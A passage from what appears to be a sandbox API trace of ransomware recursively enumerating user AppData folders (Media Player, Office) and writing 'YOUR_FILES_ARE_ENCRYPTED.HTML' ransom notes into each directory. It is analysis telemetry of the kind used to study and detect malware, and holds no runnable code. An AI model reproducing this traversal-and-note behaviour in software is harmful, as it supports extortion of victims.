pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\05_Pictures_taken_in_the_last_month.wpl") returned 130 [0159.412] lstrcmpW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.412] PathFindExtensionW (pszPath="05_Pictures_taken_in_the_last_month.wpl") returned=".wpl" [0159.412] lstrlenW (lpString=".wpl") returned 4 [0159.412] PathFindExtensionW (pszPath="05_Pictures_taken_in_the_last_month.wpl") returned=".wpl" [0159.412] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x311, dwReserved0=0x0, dwReserved1=0x60, cFileName="06_Pictures_rated_4_or_5_stars.wpl", cAlternateFileName="06_PIC~1.WPL")) returned 1 [0159.412] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\06_Pictures_rated_4_or_5_stars.wpl") returned 125 [0159.412] lstrcmpW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.412] PathFindExtensionW (pszPath="06_Pictures_rated_4_or_5_stars.wpl") returned=".wpl" [0159.412] lstrlenW (lpString=".wpl") returned 4 [0159.412] PathFindExtensionW (pszPath="06_Pictures_rated_4_or_5_stars.wpl") returned=".wpl" [0159.412] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x410, dwReserved0=0x0, dwReserved1=0x60, cFileName="07_TV_recorded_in_the_last_week.wpl", cAlternateFileName="07_TV_~1.WPL")) returned 1 [0159.412] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\07_TV_recorded_in_the_last_week.wpl") returned 126 [0159.412] lstrcmpW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.412] PathFindExtensionW (pszPath="07_TV_recorded_in_the_last_week.wpl") returned=".wpl" [0159.412] lstrlenW (lpString=".wpl") returned 4 [0159.412] PathFindExtensionW (pszPath="07_TV_recorded_in_the_last_week.wpl") returned=".wpl" [0159.412] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x3fc, dwReserved0=0x0, dwReserved1=0x60, cFileName="08_Video_rated_at_4_or_5_stars.wpl", cAlternateFileName="08_VID~1.WPL")) returned 1 [0159.412] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\08_Video_rated_at_4_or_5_stars.wpl") returned 125 [0159.412] lstrcmpW (lpString1="08_Video_rated_at_4_or_5_stars.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.412] PathFindExtensionW (pszPath="08_Video_rated_at_4_or_5_stars.wpl") returned=".wpl" [0159.412] lstrlenW (lpString=".wpl") returned 4 [0159.412] PathFindExtensionW (pszPath="08_Video_rated_at_4_or_5_stars.wpl") returned=".wpl" [0159.412] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x401, dwReserved0=0x0, dwReserved1=0x60, cFileName="09_Music_played_the_most.wpl", cAlternateFileName="09_MUS~1.WPL")) returned 1 [0159.412] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\09_Music_played_the_most.wpl") returned 119 [0159.412] lstrcmpW (lpString1="09_Music_played_the_most.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.412] PathFindExtensionW (pszPath="09_Music_played_the_most.wpl") returned=".wpl" [0159.412] lstrlenW (lpString=".wpl") returned 4 [0159.413] PathFindExtensionW (pszPath="09_Music_played_the_most.wpl") returned=".wpl" [0159.413] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x427, dwReserved0=0x0, dwReserved1=0x60, cFileName="10_All_Music.wpl", cAlternateFileName="10_ALL~1.WPL")) returned 1 [0159.413] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\10_All_Music.wpl") returned 107 [0159.413] lstrcmpW (lpString1="10_All_Music.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.413] PathFindExtensionW (pszPath="10_All_Music.wpl") returned=".wpl" [0159.413] lstrlenW (lpString=".wpl") returned 4 [0159.413] PathFindExtensionW (pszPath="10_All_Music.wpl") returned=".wpl" [0159.413] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x249, dwReserved0=0x0, dwReserved1=0x60, cFileName="11_All_Pictures.wpl", cAlternateFileName="11_ALL~1.WPL")) returned 1 [0159.413] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\11_All_Pictures.wpl") returned 110 [0159.413] lstrcmpW (lpString1="11_All_Pictures.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.413] PathFindExtensionW (pszPath="11_All_Pictures.wpl") returned=".wpl" [0159.413] lstrlenW (lpString=".wpl") returned 4 [0159.413] PathFindExtensionW (pszPath="11_All_Pictures.wpl") returned=".wpl" [0159.413] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x437, dwReserved0=0x0, dwReserved1=0x60, cFileName="12_All_Video.wpl", cAlternateFileName="12_ALL~1.WPL")) returned 1 [0159.413] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\12_All_Video.wpl") returned 107 [0159.413] lstrcmpW (lpString1="12_All_Video.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.413] PathFindExtensionW (pszPath="12_All_Video.wpl") returned=".wpl" [0159.413] lstrlenW (lpString=".wpl") returned 4 [0159.413] PathFindExtensionW (pszPath="12_All_Video.wpl") returned=".wpl" [0159.413] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x437, dwReserved0=0x0, dwReserved1=0x60, cFileName="12_All_Video.wpl", cAlternateFileName="12_ALL~1.WPL")) returned 0 [0159.413] FindClose (in: hFindFile=0x42f32c0 | out: hFindFile=0x42f32c0) returned 1 [0159.415] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0159.415] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000fdbe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0159.417] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebcee4, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebcee4*=0x3c00, lpOverlapped=0x0) returned 1 [0159.419] CloseHandle (hObject=0x5b0) returned 1 [0159.426] GetProcessHeap () returned 0x270000 [0159.427] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x746a1d0 | out: hHeap=0x270000) returned 1 [0159.427] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="0000FDBE", cAlternateFileName="")) returned 0 [0159.427] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0159.428] wnsprintfW (in: pszDest=0x745a1c8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0159.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b4 [0159.428] WriteFile (in: hFile=0x5b4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0159.431] CloseHandle (hObject=0x5b4) returned 1 [0159.431] GetProcessHeap () returned 0x270000 [0159.432] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x745a1c8 | out: hHeap=0x270000) returned 1 [0159.432] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 0 [0159.432] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0159.432] wnsprintfW (in: pszDest=0x744a1c0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0159.432] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\media player\\sync playlists\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0159.432] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0159.435] CloseHandle (hObject=0x5ac) returned 1 [0159.435] GetProcessHeap () returned 0x270000 [0159.436] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0159.436] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd4120340, ftCreationTime.dwHighDateTime=0x1d706b0, ftLastAccessTime.dwLowDateTime=0xd4120340, ftLastAccessTime.dwHighDateTime=0x1d706b0, ftLastWriteTime.dwLowDateTime=0xd4120340, ftLastWriteTime.dwHighDateTime=0x1d706b0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Transcoded Files Cache", cAlternateFileName="TRANSC~1")) returned 1 [0159.436] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache") returned 83 [0159.436] GetProcessHeap () returned 0x270000 [0159.436] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x744a1c0 [0159.436] lstrcpyW (in: lpString1=0x744a1c0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache" [0159.436] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\*" [0159.436] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd4120340, ftCreationTime.dwHighDateTime=0x1d706b0, ftLastAccessTime.dwLowDateTime=0xd4120340, ftLastAccessTime.dwHighDateTime=0x1d706b0, ftLastWriteTime.dwLowDateTime=0xd4120340, ftLastWriteTime.dwHighDateTime=0x1d706b0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.437] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd4120340, ftCreationTime.dwHighDateTime=0x1d706b0, ftLastAccessTime.dwLowDateTime=0xd4120340, ftLastAccessTime.dwHighDateTime=0x1d706b0, ftLastWriteTime.dwLowDateTime=0xd4120340, ftLastWriteTime.dwHighDateTime=0x1d706b0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.437] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd4120340, ftCreationTime.dwHighDateTime=0x1d706b0, ftLastAccessTime.dwLowDateTime=0xd4120340, ftLastAccessTime.dwHighDateTime=0x1d706b0, ftLastWriteTime.dwLowDateTime=0xd4120340, ftLastWriteTime.dwHighDateTime=0x1d706b0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0159.437] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0159.437] wnsprintfW (in: pszDest=0x744a1c0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0159.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\media player\\transcoded files cache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0159.437] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0159.440] CloseHandle (hObject=0x5ac) returned 1 [0159.440] GetProcessHeap () returned 0x270000 [0159.441] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0159.441] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd4120340, ftCreationTime.dwHighDateTime=0x1d706b0, ftLastAccessTime.dwLowDateTime=0xd4120340, ftLastAccessTime.dwHighDateTime=0x1d706b0, ftLastWriteTime.dwLowDateTime=0xd4120340, ftLastWriteTime.dwHighDateTime=0x1d706b0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Transcoded Files Cache", cAlternateFileName="TRANSC~1")) returned 0 [0159.441] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0159.441] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0159.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\media player\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0159.442] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0159.480] CloseHandle (hObject=0x4a8) returned 1 [0159.480] GetProcessHeap () returned 0x270000 [0159.481] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0159.482] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x141f2990, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x5ad2f470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x5ad2f470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Office", cAlternateFileName="")) returned 1 [0159.482] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office") returned 54 [0159.482] GetProcessHeap () returned 0x270000 [0159.482] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0159.483] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office" [0159.483] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\*" [0159.483] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x141f2990, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x5ad2f470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x5ad2f470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0159.484] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x141f2990, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x5ad2f470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x5ad2f470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.485] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x141f2990, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x6a341890, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6a341890, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="16.0", cAlternateFileName="")) returned 1 [0159.485] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0") returned 59 [0159.485] GetProcessHeap () returned 0x270000 [0159.486] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0159.486] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0" [0159.486] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\*" [0159.486] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x141f2990, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x6a341890, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6a341890, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.486] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x141f2990, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x6a341890, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6a341890, 